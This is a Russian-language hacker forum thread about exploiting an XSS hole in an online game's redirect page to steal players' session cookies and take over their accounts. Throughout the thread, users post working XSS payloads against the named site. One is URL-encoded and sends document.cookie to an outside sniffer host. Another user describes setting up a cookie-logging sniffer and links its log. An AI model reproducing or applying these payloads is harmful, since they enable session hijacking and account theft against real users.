вощем давненько нашол что в энтой игре юзается Voc чат в следствии чего имеется XSS дыра _http://east.enigma-planet.com/go.php?url=javascript:alert('up') юзая которую можно перехватить ID сессии на форуме. Только вот какая трабла после подскановки куков я напрочь не могу азйти в игру-((
2 bul.666 всё есть всё вставляю только чёт не прокатывает если нифпадлу попробуй сделать.. всё с нуля ___ _www.enigma-planet.com/ рег у них приметивный даж подтверждать не заставляют
У тя Скрипт работает только при нажатии попробуй этот: Тока постоянно обновляется... На снифак кинуть инфу хватит =)
норм CSS у меня есть -> Code: http://east.enigma-planet.com/go.php?url=go.php?url=%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%27%68%74%74%70%3a%2f%2f%61%6e%74%69%63%68%61%74%2e%72%75%2f%63%67%69%2d%62%69%6e%2f%73%2e%6a%70%67%3f%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b трабла именно с подстановкой куков
У мя все работает... Попробуй так... Создай файл гденить на сервере с содержанием: Тут на мой сниффер... =) И назави его например sniff... Далле твойа xss будет выглядить так: Логи тут: http://lamer-lol.h10.ru/snif/log.txt =)
ты попробуй именно куки подставить и как фатк спереть там акк у когонить куки у меня нормуль прутся.. но када всё в броузе всё подставляю происходит какая то трабла и я не могу в игру зайти